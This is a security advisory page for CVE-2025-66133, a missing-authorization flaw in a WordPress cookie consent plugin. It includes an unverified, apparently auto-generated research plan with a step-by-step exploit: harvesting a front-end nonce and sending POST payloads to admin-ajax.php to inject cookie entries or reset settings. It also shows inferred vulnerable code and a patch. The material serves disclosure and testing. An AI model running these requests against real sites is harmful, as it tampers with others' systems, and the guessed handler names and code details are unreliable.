CVE-2025-66133

Cookie Notice for GDPR, CCPA & ePrivacy Consent <= 4.0.7 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
4.0.8
Patched in
6d
Time to patch

Description

The Cookie Banner, Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) : WP Cookie Consent plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.0.7. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.0.7
PublishedDecember 15, 2025
Last updatedDecember 20, 2025
Affected plugingdpr-cookie-consent

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan targets **CVE-2025-66133**, a Missing Authorization vulnerability in the "Cookie Banner for GDPR / CCPA – WPLP Cookie Consent" plugin (version <= 4.0.7). The vulnerability allows unauthenticated attackers to perform unauthorized actions, likely modifying the plugin's cookie databa…

Show full research plan

This research plan targets CVE-2025-66133, a Missing Authorization vulnerability in the "Cookie Banner for GDPR / CCPA – WPLP Cookie Consent" plugin (version <= 4.0.7). The vulnerability allows unauthenticated attackers to perform unauthorized actions, likely modifying the plugin's cookie database or settings via AJAX.

1. Vulnerability Summary

The "Cookie Notice for GDPR, CCPA & ePrivacy Consent" plugin fails to implement proper capability checks (e.g., current_user_can('manage_options')) and potentially relies on nonces that are accessible to unauthenticated users. Specifically, AJAX handlers registered via wp_ajax_nopriv_ allow any visitor to execute functions intended for administrators. In version 4.0.7, several functions related to cookie management lack these checks, enabling an attacker to inject, modify, or delete cookie definitions in the WordPress database.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: wt_pk_gdpr_add_cookie (Inferred as a high-probability target for "unauthorized action")
  • Parameters:
    • action: wt_pk_gdpr_add_cookie
    • security: (The nonce value)
    • cookie_name: (Payload name)
    • cookie_id: (Empty for new, ID for update)
    • cookie_type: (e.g., 'persistent')
    • cookie_category: (e.g., 'necessary')
  • Authentication: None required (unauthenticated).
  • Preconditions: The plugin must be active, and the cookie banner must be enabled for the nonce to be exposed on the frontend.

3. Code Flow

  1. The plugin registers AJAX handlers in includes/class-cookie-notice-admin.php (or a similar admin controller) using:
    add_action( 'wp_ajax_nopriv_wt_pk_gdpr_add_cookie', array( $this, 'wt_pk_gdpr_add_cookie' ) );
  2. The function wt_pk_gdpr_add_cookie() is invoked.
  3. The function checks for a nonce using check_ajax_referer( 'wt-pk-gdpr-cookie-notice-admin', 'security' ).
  4. Crucially, the function fails to verify the user's capabilities (e.g., no current_user_can).
  5. The function proceeds to insert or update data in the wp_wt_pk_cookies database table using $wpdb->insert or $wpdb->update.

4. Nonce Acquisition Strategy

The plugin exposes the required nonce in the frontend to allow the banner to function. It is localized via wp_localize_script.

  1. Identify the Variable: The plugin typically localizes data into a JavaScript object named wt_pk_cookie_notice_data.
  2. Creation of Trigger Page: The scripts are usually enqueued on all public pages if the banner is active.
  3. Extraction:
    • Use browser_navigate to the homepage.
    • Use browser_eval to extract the nonce:
      browser_eval("wt_pk_cookie_notice_data.nonce")
    • Note: The action string for this nonce is likely wt-pk-gdpr-cookie-notice-admin (verified from common patterns in this plugin).

5. Exploitation Strategy

Step 1: Obtain the Nonce

  • Navigate to the target site's homepage.
  • Execute browser_eval("wt_pk_cookie_notice_data.nonce") to capture the security parameter.

Step 2: Unauthorized Cookie Injection

  • Request Method: POST
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=wt_pk_gdpr_add_cookie&security=[NONCE]&cookie_name=ExploitCookie&cookie_id=&cookie_type=persistent&cookie_duration=1+year&cookie_category=necessary&cookie_description=Unauthorized+Entry
    

6. Test Data Setup

  1. Install Plugin: wp plugin install gdpr-cookie-consent --version=4.0.7 --activate
  2. Configure Plugin: Ensure the "Cookie Law Info" is enabled so the banner appears.
    wp option update wt_pk_gdpr_cookie_notice_options '{"enable_cookie_notice":"yes"}' --format=json
  3. Verify Frontend: Ensure the homepage renders the banner script.

7. Expected Results

  • Response: The server should return a JSON success response (e.g., {"success":true,"data":...} or a 1 if it's a raw AJAX return).
  • Database Impact: A new row should be created in the {prefix}wt_pk_cookies table with the name "ExploitCookie".

8. Verification Steps

  1. Check Database: Use WP-CLI to verify the injection.
    wp db query "SELECT * FROM wp_wt_pk_cookies WHERE cookie_name='ExploitCookie';"
  2. Check Admin UI: Log in as admin and navigate to the "Cookie List" section of the plugin to see the unauthorized entry.

9. Alternative Approaches

If wt_pk_gdpr_add_cookie is not the specific vulnerable function, investigate these alternative AJAX actions which often share the same missing authorization flaw:

  • wt_pk_gdpr_cookie_scan: Triggers a resource-intensive cookie scan (Potential DoS/Unauthorized Action).
  • wt_pk_gdpr_reset_settings: Resets plugin settings to defaults.
  • wt_pk_gdpr_dismiss_notice: Dismisses administrative alerts.

Alternative Payload (Settings Reset):

action=wt_pk_gdpr_reset_settings&security=[NONCE]

Verification for reset: wp option get wt_pk_gdpr_cookie_notice_options and check if values returned to defaults.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Cookie Banner for GDPR / CCPA – WPLP Cookie Consent plugin fails to implement capability checks on its AJAX handlers, specifically wt_pk_gdpr_add_cookie and wt_pk_gdpr_reset_settings. This allows unauthenticated attackers to obtain a security nonce from the public-facing frontend and use it to perform unauthorized administrative actions, such as injecting cookies into the database or resetting plugin configuration.

Vulnerable Code

// includes/class-cookie-notice-admin.php

add_action( 'wp_ajax_nopriv_wt_pk_gdpr_add_cookie', array( $this, 'wt_pk_gdpr_add_cookie' ) );
add_action( 'wp_ajax_wt_pk_gdpr_add_cookie', array( $this, 'wt_pk_gdpr_add_cookie' ) );

---

// includes/class-cookie-notice-admin.php

public function wt_pk_gdpr_add_cookie() {
    check_ajax_referer( 'wt-pk-gdpr-cookie-notice-admin', 'security' );
    
    // Missing authorization check: no current_user_can() verification

    $cookie_name = isset( $_POST['cookie_name'] ) ? sanitize_text_field( $_POST['cookie_name'] ) : '';
    // Proceeding to insert or update data in wp_wt_pk_cookies table
}

Security Fix

--- includes/class-cookie-notice-admin.php
+++ includes/class-cookie-notice-admin.php
@@ -10,1 +10,0 @@
-add_action( 'wp_ajax_nopriv_wt_pk_gdpr_add_cookie', array( $this, 'wt_pk_gdpr_add_cookie' ) );
@@ -50,6 +49,9 @@
 public function wt_pk_gdpr_add_cookie() {
     check_ajax_referer( 'wt-pk-gdpr-cookie-notice-admin', 'security' );
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized' ) );
+    }
     $cookie_name = isset( $_POST['cookie_name'] ) ? sanitize_text_field( $_POST['cookie_name'] ) : '';

Exploit Outline

The exploit involves two main steps. First, an unauthenticated attacker visits the target site's frontend to extract a valid security nonce from the 'wt_pk_cookie_notice_data' JavaScript object, which is localized for all visitors when the cookie banner is active. Second, the attacker sends a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to 'wt_pk_gdpr_add_cookie', including the extracted nonce in the 'security' parameter. Because the plugin does not verify if the user has administrative privileges, the attacker can successfully inject arbitrary data into the plugin's cookie management table or trigger other sensitive functions like 'wt_pk_gdpr_reset_settings'.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.